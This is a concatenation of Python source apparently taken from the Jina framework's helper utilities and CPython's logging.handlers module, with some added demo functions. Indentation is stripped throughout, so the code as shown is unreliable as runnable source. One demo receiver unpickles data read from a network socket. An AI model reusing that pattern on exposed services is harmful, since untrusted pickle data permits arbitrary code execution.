def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
    key 'b' can be referenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if (
not isinstance(part1, int)
and not isinstance(_dict, (Iterable, ListValue))
and isinstance(_dict, (dict, Struct, MessageMapContainer))
and part1 in _dict
or isinstance(part1, int)
or isinstance(_dict, (Iterable, ListValue))
):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import io, logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
namer = None
rotator = None
def __init__(self, filename, mode, encoding=None, delay=False, errors=None):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.mode = mode
self.encoding = encoding
self.errors = errors
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False, errors=None):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
if "b" not in mode:
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, mode, encoding=encoding,
delay=delay, errors=errors)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
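# --- Hedged usage sketch (added, not part of the original module): a typical size-based
# --- rotation setup; the file name and limits below are illustrative only.
def _example_rotating_file_handler():
    logger = logging.getLogger('example.rotating')
    handler = RotatingFileHandler('app.log', maxBytes=1_000_000, backupCount=5)
    handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
    logger.addHandler(handler)
    # once app.log nears 1 MB it is renamed to app.log.1, ... up to app.log.5
    logger.warning('hello, rotating log')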
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None,
errors=None):
encoding = io.text_encoding(encoding)
BaseRotatingHandler.__init__(self, filename, 'a', encoding=encoding,
delay=delay, errors=errors)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
                    # self.rolloverAt is 13:45 and it is now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
# See bpo-44753: Don't use the extension when computing the prefix.
prefix = os.path.splitext(baseName)[0] + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
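# Illustrative sketch (not part of the original module): a minimal way to wire
# up a TimedRotatingFileHandler that rolls over at midnight and keeps the last
# seven days of logs. The file name 'app.log' is only an example value.
def _demo_timed_rotating_handler():
    demo_logger = logging.getLogger('demo.timed')
    handler = TimedRotatingFileHandler('app.log', when='midnight', backupCount=7)
    handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
    demo_logger.addHandler(handler)
    demo_logger.warning('this line ends up in app.log, rotated nightly')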
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False,
errors=None):
if "b" not in mode:
encoding = io.text_encoding(encoding)
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
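# Illustrative sketch (not part of the original module): WatchedFileHandler is
# typically dropped in wherever FileHandler would otherwise be used, so that an
# external tool such as logrotate can move the file out from under the process.
# 'service.log' is only an example path.
def _demo_watched_file_handler():
    demo_logger = logging.getLogger('demo.watched')
    demo_logger.addHandler(WatchedFileHandler('service.log'))
    demo_logger.error('reopened automatically if service.log is rotated away')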
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
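# Illustrative sketch (not part of the original module): the wire format
# produced by SocketHandler.makePickle() is a 4-byte big-endian length prefix
# followed by a pickled dict of the LogRecord attributes, so a receiving end
# can rebuild records with logging.makeLogRecord(). The host/port values below
# are examples only.
def _demo_socket_logging_sender():
    demo_logger = logging.getLogger('demo.socket')
    demo_logger.addHandler(SocketHandler('localhost', DEFAULT_TCP_LOGGING_PORT))
    demo_logger.info('pickled and sent over TCP')
def _demo_socket_logging_receiver(conn):
    # Read the 4-byte length prefix, then the pickled attribute dict.
    chunk = conn.recv(4)
    if len(chunk) < 4:
        return None
    slen = struct.unpack('>L', chunk)[0]
    data = conn.recv(slen)
    while len(data) < slen:
        data += conn.recv(slen - len(data))
    record = logging.makeLogRecord(pickle.loads(data))
    logging.getLogger(record.name).handle(record)
    return record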
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
LOG_NTP = 12 # NTP subsystem
LOG_SECURITY = 13 # Log audit
LOG_CONSOLE = 14 # Log alert
LOG_SOLCRON = 15 # Scheduling daemon (Solaris)
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"console": LOG_CONSOLE,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"ntp": LOG_NTP,
"security": LOG_SECURITY,
"solaris-cron": LOG_SOLCRON,
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
self.socket = None
self.createSocket()
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def createSocket(self):
address = self.address
socktype = self.socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
            # Moreover, we ignore these errors while logging, so it is no worse
            # to ignore them here as well.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.socket
if sock:
self.socket = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
